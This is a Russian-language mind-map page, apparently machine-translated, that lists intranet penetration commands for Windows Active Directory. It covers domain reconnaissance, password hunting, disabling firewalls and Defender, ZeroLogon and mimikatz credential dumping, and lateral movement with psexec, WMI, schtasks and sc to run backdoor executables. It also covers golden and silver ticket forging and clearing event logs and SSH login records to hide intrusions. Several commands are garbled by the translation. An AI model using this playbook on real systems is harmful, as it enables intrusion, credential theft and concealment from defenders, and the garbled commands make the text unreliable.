Галерея диаграмм связей Общие команды для проникновения в интранет
Полное реагирование на чрезвычайные ситуации при эксплуатации и обслуживании сети, включая сбор информации, поиск файлов, Удаленные, запланированные задачи, Переадресация портов, бэкдор, Инструменты, сбор информации, Очистка следов и т.д.
Отредактировано в 2024-03-22 14:57:47Общие команды для проникновения в интранет
собрать сообщение
сетевая команда
чистое время/домен сетевая группа «администраторы домена» /домен сетевая группа «контроллеры домена» /домен сетевой администратор пользователя/домен nltest /domain_trusts Получить доверительные отношения домена нлтест /dclist: чистая доля чистый просмотр \\domainip net view /domain Просмотр списка доменов/рабочих групп net view /domain:secwing Просмотр списка компьютеров в домене secwing. net config Рабочая станция запрашивает, к какому домену принадлежит машина netstat -ano |findstr сетевые учетные записи Просмотр локальной политики паролей
установить переменные среды просмотра
nbtstat -запрос ip netbiso эй/все qwinsta //Просмотр статуса входа запрос пользователя //Просмотр времени последнего входа в систему администратора nltest /domain_trusts //Получаем информацию о доверии домена Taskkill /f /im список задач /svc Просмотр процессов список задач /S ip /U домен\имя пользователя /P /V //Просмотр списка процессов удаленного компьютера Tracert IP // Трассировка маршрута маршрутная печать //Печать таблицы маршрутизации arp -a //Показать все активные IP-адреса в этом сегменте сети arp -s (ip MAC) //Привязываем mac и ip адрес arp -d (ip MAC) //Отвязываем Mac и IP-адрес reg-запрос «HKEY_CURRENT_USER\Software\Microsoft\Клиент сервера терминалов\Default» /ve Получить последние записи входа в mstsc setspn -Q \*/\* список SPN
Поиск файлов
findstr находит файлы, содержащие пароли
findstr /si пароль *.txt findstr /si пароль *.xml findstr /si пароль *.ini
каталог найти местоположение файла
каталог /b /s unattend.xml каталог /b /s web.config каталог /b /s sysprep.inf
Удаленно
Отключить брандмауэр
netsh firewall установить режим работы = отключить netsh advfirewall отключил состояние всех профилей
близковетерзащита
чистая остановка ветрозащиты
Восстановить брандмауэр по умолчанию
сброс брандмауэра netsh
Открыть порт 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Сервер /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
CVE-2020-1472
привилегия::отладка секурлса::logonpasswords lsadump::zerologon /target:ip /account:ADC1$ lsadump::zerologon /target:ip /account:ADC1$ /exploit lsadump::dcsync /domain:DC2.com /dc:DC2 /user:administrator /authuser:DC2$ /authdomain:DC2 /authpassword:"" /authntlm sekurlsa::pth/пользователь:администратор/домен:/rc5:161cff084477fe596a5db81874498a24
МПК
net use \\ip\ipc$ пароль /пользователь:домен\пользователь net use [url=file://\\IP\ipc$]\\IP\ipc$[/url] пароль /пользователь:имя_пользователя@домен скопируйте putty.exe \\192.168.0.100\admin$ чистое время \\192.168.0.100 в \\192.168.0.100 19:45 putty.exe net use Z: \\192.168.0.100\c$ Сопоставьте целевой диск c с локальным каталог \\192.168.17.138\c$ скопируйте test.exe \\192.168.17.138\c$ чистое использование * \\192.168.0.100 /del чистое использование * /del /y чистое использование */del сеанс просмотра сетевого использования сетевой сеанс
WMI
wmic qfe get hotfixid //Просмотр установленных исправлений, это очень практично список wmic qfe полный /format:htable > hotfixes.htm //Подробная установка патча wmic qfe // Запросить информацию об исправлении и адрес загрузки, предоставленные Microsoft ping Hostname (имя хоста) // Отобразить IP-адрес имени компьютера wmic Share get name,path //Просмотр пути, указанного SMB wmic nteventlog get path,filename,writeable //Запрос места хранения файлов системного журнала Краткий список сервисов wmic //Просмотр сервисов процессов Краткий список процессов wmic //Просмотр процесса Краткий список запуска wmic //Просмотр информации о программе запуска Краткий список продуктов wmic //Просмотр программы установки и информации о версии (подсказки об использовании уязвимостей) Список запуска wmic заполнен // Определить программы, запускаемые при загрузке процесс wmic, где(description="mysqld.exe") >> mysql.log //Получаем путь установки программного обеспечения wmic /node:ip /user: /p вызов процесса pwd create c:\backdoor.exe wmic /node /user: /password: процесс, в котором e name="cmd.exe" завершается wmic /node:10.10.10.11 /user:administrator /password:1qaz@WSX вызов процесса create «cmd.exe /c ipconfig>c:\result.txt» WMIcmd.exe -h 192.168.1.152 -d имя хоста -u pt007 -p admin123 -c "ipconfig" Процесс wmic /node /user /password, где name="cmd.exe" получает CommandLine
Дела по расписанию
AT-команда (отменена win server2012)
Установить сетевое соединение net use \\192.168.1.100\c$ 1qaz@WSX /домен пользователя\пользователь Скопируйте bat-файл на удаленный компьютер скопируйте exec.bat \\192.168.1.100\c$\windows\debug\exec.bat Просмотр времени на удаленном компьютере чистое время \\192.168.1.100 Создать новую удаленную запланированную задачу в \\192.168.1.100 21.52 c:\windows\temp\exec.bat Просмотр списка удаленных запланированных задач по адресу \\192.168.1.100
Штаски
Создать задачу schtasks /create /s ip /u администратор /пароль /ru «система» /tn adduser(имя) /sc DAILY(время) /tr c:\windows\debug\add.bat /f Запуск задач schtasks /run /s ip /u администратор /p пароль /tn adduser /i schtasks /run /tn update /$ 10.10.10.137 /u test \administrator /p 1qaz@WSX Удалить задачу schtasks /delete /s ip /u администратор /p пароль /tn adduser /f
Команда управления службами SC, встроенная в Microsoft, сотрудничает с общим доступом к файлам и удаленно создает службы.
Установите соединение ipc и выполните SC. чистое использование \\192.168.17.138\c$ "admin123" /user:pt007 чистое использование каталог \\192.168.17.138\c$ скопируйте test.exe \\192.168.17.138\c$ Создать сервис sc \\remote_ip create имя_службы binpath= c:\backdoor.exe sc \\10.10.10.10 создать обновление binpath= c:\programdata\a.bat Запустить службу sc \\remote_ip start имя_службы sc \\10.10.10.10 начать обновление Выведен из эксплуатации sc \\remote_ip остановить имя_службы sc \\10.10.10.10 остановить обновление Удалить услугу sc \\remote_ip удалить имя_службы sc \\10.10.10.10 удалить обновление
Перенаправление порта
Переадресация портов Netsh
netsh firewall show config //Просмотр политики брандмауэра netsh firewall show status //Просмотр политики брандмауэра Включить переадресацию портов netsh интерфейс portproxy добавить v4tov4 Listenaddress=localaddress Listenport=localport Connectaddress=destaddress Connectport=destport открытый брандмауэр netsh advfirewall брандмауэр добавить имя правила = «имя брандмауэра» протокол = TCP dir = в localip = IP localport = порт действие = разрешить Показать все правила переадресации порт-прокси интерфейса netsh показать все Удалить вперед netsh интерфейс portproxy удалить v4tov4 Listenport=port Listenaddress=ip перезагрузить сброс прокси порта интерфейса netsh
SSH-пересылка
1.ssh переадресация портов ssh -L [<локальный хост>:] <локальный порт>:<удаленный хост>:<удаленный порт><имя хоста SSH> 2.ssh обратная переадресация портов ssh -R [<локальный хост>:]<локальный порт>:<удаленный хост>:<удаленный порт><имя хоста SSH> 3.ssh носки-прокси ssh -D [<локальный хост>:] <локальный порт><имя хоста SSH>
черный ход
золотая нота
Условия и требования для золотых купюр: 1. Доменное имя 2. Значение SID домена whoami/user. 3. Хэш пароля NTLM-пароля учетной записи Krbtgt домена. 4. Поддельное имя пользователя sekurlsa::pth /user:administrator /domain:"GOD.org" /ntlm:61465a991b168727b65b3644aab823cd Адрес домена пользователя для входа в систему, значение шифрования ntlm Здесь появится окно CMD. Давайте сначала проверим, есть ли у нас разрешение, используя dir \\OWA.GOD.org\c$ [Просмотр диска C управления доменом]. каталог \\\\DC.zkaq.cn\c$ lsadump::dcsync /user:krbtgt /domain: получите пароль krbtgt [mimikatz имитирует управление доменом и запросит информацию об учетной записи и пароле у целевого элемента управления доменом] Извлеките sid и hashNTLM внутри. Kerberos :: GOLDEN /Admin: администратор /domain:god.org /sign: S-1-5-21-2952760202-13539024381784089 /KRBTGT: 58e91a5886513AB2224312314000 61 /ticket:Administrator.kiribi [Счета за производство] kerberos::pttadmin.kiribi [загрузить билет] Прямая инъекция золотых банкнот kerveros::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:domainsid /krbtgt:hash /ptt Kerberos::purge очищает билеты привилегия::отладка Подождите, пока администратор войдет в систему, чтобы получить пароль. mimikatz #privilege::debug Привилегия «20» ОК mimikatz # разное::memssp Вкололи =) мимикац #выход
серебряные банкноты
Просмотр текущего идентификатора пользователя кто/пользователь Получить хэш целевого компьютера секурлса::logonpasswords 1472 уязвимость Создание серебряных банкнот kerberos::golden /sid:domainsid /domain:test.local /ptt /id: поддельный идентификатор пользователя /target:mdc.test.local /service:cifs /rc: хеш целевого компьютера /user: поддельное имя пользователя
инструмент
dsquery
dsquery.exe user -limit 0#Запрос информации об объекте пользователя dsquery.exe group -limit 0 #Запрос информации об объекте группы dsquery.exe ou -limit 0#Запрос информации об объекте OU dsquery user domainroot -limit 65535 && net user /domain //Перечислить все имена пользователей в домене dsquery server -domain supre.com | dsget server -dnsname -site //Поиск всех контроллеров домена в домене и отображение их DNS-имен хостов и имен сайтов. dsquery contact //Находим контакты в каталоге dsquery subnet //Перечислите подразделения сегмента сети в этом домене dsquery group && net group /domain //Список групп в этом домене dsquery ou //Перечислить организационные подразделения в этом домене dsquery server && net time /domain //Показать список контроллеров домена в этом домене dsquery site -o rdn //Поиск всех имен сайтов в домене dsquery group dc=GOD,dc=org |подробнее Поиск по всем группам в домене dc=god, dc=org dsquery.exe компьютер #Находим компьютер в цели dsquery.exe site #Найти организационные подразделения в каталоге dsquery.exe server #Найдите экземпляр AD DC/LDS в каталоге
ADнайти
AdFind -sc dclist #Список имен контроллеров домена AdFind -sc Computers_active #Запрашивать подключенные к сети компьютеры в текущем домене AdFind -sc компьютеры_активное имя операционной системы #Запрос компьютеров в сети в текущем домене (только отображаемое имя и операционная система) AdFind.exe -sc Computers_active name dnshostname #Запросить активные хосты в домене и вывести имя хоста и имя домена AdFind -f "objectcategory=computer" #Опрос всех компьютеров в текущем домене AdFind -f "objectcategory=computer" name OperatingSystem #Запросить все компьютеры в текущем домене (отображаются только имя и операционная система) AdFind -users name #Опрос всех пользователей в домене AdFind -sc gpodmp #Запросить все объекты групповой политики AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* #Запрос подробной информации обо всех пользователях в домене AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:test #Запросить данные конкретного пользователя в домене AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:test mail #Запрос конкретной пользовательской информации (почты) в домене AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* -dn #Запросить информацию dn всех пользователей в домене AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* -c #Запросить количество пользователей в домене AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc g:* #Запрос подробной информации обо всех группах в домене AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc g:*Admin #Запрос подробной информации обо всех группах в домене, имя группы которых содержит Admin AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc o:* #Запросить все данные OU в домене AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc c:* #Запрос подробной информации обо всех компьютерах в домене AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc s:* #Запрос подробной информации обо всех сайтах в домене
pexec paexec
psexec.exe -accepteula \\10.10.10.137 -u test\administrator -p 1qaz@WSX -i cmd.exe psexec.exe -accepteula -i -s -d cmd paexec.exe \\ip -u домен\пользователь -p pwd cmd.exe -noname net use \\ip pwd /u:domain\user paexec.exe \\ip cmd.exe netsh winhttp sh просмотр прокси-сервера
мультиплексирование портов winrm в сеть
быстрая конфигурация WinRM -q winrm s winrm/config/Client @{TrustedHosts="*"} Добавлен мониторинг порта 80. winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} Изменить 5985 на 80 winrm set winrm/config/Listener?Address=* Transprot=HTTP @{port=80} Измените порт WinRM на веб-порт winrs -r:http://xx -u:DC20\administror -p:1qaz@WSX cmd
Доступ к информации
PowerView
нагрузка Имопорт-Модуль .\PowerView.ps1 #Выполнить запрос Get-DomainGroup #Query сведения о группе Get-DomainOU #Запрос подробной информации о подразделении Get-DomainUser #Запрос сведений о пользователе
psloggendon.exe
имя пользователя psloggedon.exe -l отображает только локальных пользователей, вошедших в систему, и не отображает других пользователей, вошедших в систему в сети. -x не отображает время входа в систему Отображает, что пользователь, вошедший в систему на удаленном компьютере, может ввести: psloggedon \\IP-адрес удаленной машины Добавьте -accepteula впервые, чтобы не отображать информацию об авторских правах.
netsess.exe
netsess.exe \\ПЕРВИЧНЫЙ
PVEFindADUser.exe
PVEFindADUser.exe -текущий
вевтутил
wevtutil epl Security C:\log.evtx /q:"*[EventData[Data[@Name='LogonType']='3'] и System[(EventID=4624) и TimeCreated[timediff(@SystemTime) <= 259200000 ]]]" /r:IP-адрес удаленного компьютера /u:имя пользователя/p:пароль #epl экспортировать журнал #Security означает журнал безопасности. #C:\log.evtx представляет расположение экспортированного журнала. При удаленном экспорте он будет экспортирован на удаленный компьютер. #/q: представляет оператор запроса журнала. #System[(EventID=4624) представляет идентификатор времени 4624, который является журналом успешного входа пользователя в систему. #EventData[Data[@Name='LogonType']='3'] означает, что тип входа — сетевой вход. #TimeCreated[timediff(@System Time) <= 259200000] означает, что будут экспортированы только журналы за последний месяц. Единица измерения 259200000 — миллисекунды. Размер числа можно изменить в соответствии с фактическими потребностями. #Если вы экспортируете локально, вам не нужно указывать параметр /r. Дополнительную информацию об использовании #wevtutil см. в его справочной документации, которую можно использовать для удаления журналов Windows.
логпарсер
LogParser.exe -i:EVT -o csv "ВЫБЕРИТЕ отдельный TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) как USERNAME,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) как SOURCE_IP FROM C:\*. evtx" > C:\log.csv # -i:EVT означает, что формат ввода журнала — evtx # -o csv означает, что выходной формат — csv # Содержимое в двойных кавычках является оператором запроса # «различение» означает дедупликацию результатов # TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) as USERNAME Анализируем имя журнала из журнала входа в систему # USERNAME,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) Анализ источника входа в систему из журнала входа в систему # *.evtx может обрабатывать несколько файлов журналов одновременно # Вы можете просмотреть детали журнала входа в систему с помощью следующей команды LogParser.exe -i:EVT -o:DATAGRID «выбрать * из *.evtx»
очистка следов
вевтутил
wevtutil el перечисляет имена всех журналов в системе Система wevtutil cl очищает системные журналы Приложение wevtutil cl очищает журналы приложений wevtutil cl Security очищает журналы безопасности for /f "delims=" %j in('wevtutil.exe el') do @wevtutil.exe cl "%j" c:\windows\system32\winevt\logs\
Защитник Windows
«C:\PROGRA~1\WINDOW~1\mpcmdrun.exe» -Restore -ListAll powershell -Command Add-MpPreference -ExclusionPath "C:\tmp" powershell -Command Add-MpPreference -ExclusionExtension".java" powershell -Command Add-MpPreference -ExclusionProcess "*.exe" powershell -Команда Get-MpPreference
данные для входа по ssh
/var/log/btmp записывает всю информацию об ошибках входа в систему, для просмотра используйте команду Lastb. /var/log/lastlog записывает журнал времени последнего входа всех пользователей в систему. Чтобы просмотреть его, используйте команду Lastlog. /var/log/wtmp записывает информацию о входе и выходе всех пользователей, используйте последнюю команду для просмотра /var/log/utmp записывает информацию о вошедшем в систему пользователе, используйте w, who, user и другие команды для просмотра. /var/log/secure записывает информацию журнала, связанную с безопасностью. /var/log/message записывает информацию и журналы ошибок после запуска системы. Последняя запись входа, отображаемая при входе в ssh время последнего входа с ip Записывается в файл /var/log/lastlog ~/.ssh/known_hosts. Вы можете использовать sed для замены sed -i 's/own ip/original ip' /var/log/lastlog sed -i '/сегодняшняя дата/имя файла Авторизуйтесь в системе незаметно и не будет обнаружен командами w, who, Last и другими командами. ssh -T root@192.168.01 /bin/bash -i